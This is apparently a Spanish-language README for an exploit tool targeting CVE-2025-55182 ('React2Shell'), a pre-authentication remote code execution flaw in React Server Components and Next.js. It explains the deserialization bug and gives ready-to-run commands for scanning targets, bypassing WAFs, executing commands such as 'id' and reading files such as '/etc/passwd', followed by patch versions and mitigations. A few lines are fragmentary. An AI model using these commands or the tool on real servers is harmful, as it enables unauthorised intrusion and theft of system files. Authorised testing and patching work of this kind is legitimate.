
Exploit de RCE de pre-autenticación para CVE-2025-55182 (React2Shell) dirigido a React Server Components. Incluye escaneo, verificación OAST, bypass de WAF, ejecución de comandos y lectura de archivos.
Ejecución remota de código sin autenticación previa en React Server Components (RSC), Next.js y frameworks relacionados.
CVE-2025-55182 (también conocido como React2Shell) es una vulnerabilidad crítica de RCE sin autenticación previa que afecta al ecosistema de React Server Components (RSC). Un atacante no autenticado puede comprometer completamente un servidor vulnerable con una única solicitud HTTP POST manipulada.
React Server Components utiliza un formato de serialización personalizado llamado React Flight para serializar referencias a funciones y llamadas a módulos. La vulnerabilidad reside en el mecanismo de decodificación de payloads que procesa las solicitudes POST entrantes a los endpoints RSC.
Cuando el servidor recibe un payload de React Flight, lo deserializa sin una validación adecuada, confiando en los campos $$typeof controlados por el atacante y en la resolución de referencias a módulos. Esto permite a un atacante:
child_process, fs, net)$F (función)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id, whoami)./etc/passwd, package.json).git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
Uso
Escaneo Básico
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
Verificar RCE con OAST
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
Prueba Completa de Evasión
python3 poc.py -t https://target.com -m bypass --verbose
Ejecutar Comandos
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
Leer Archivos
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
Usando un Proxy (p. ej., Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
Estructura de Archivos
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
Mitigación
Parche (Recomendado)
npm install [email protected]
npm install [email protected] [email protected]
Soluciones Temporales
· Deshabilitar Server Functions ("use server") · Reglas WAF para bloquear Content-Type: text/x-component · Segmentación de red para endpoints RSC
Referencias
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Aviso legal: Solo para pruebas de seguridad autorizadas.
Autor: SentinelX · https://t.me/SentinelXsecurity
| Paquete | Vulnerable | Corregido |
|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (consulte el parche) | versiones corregidas |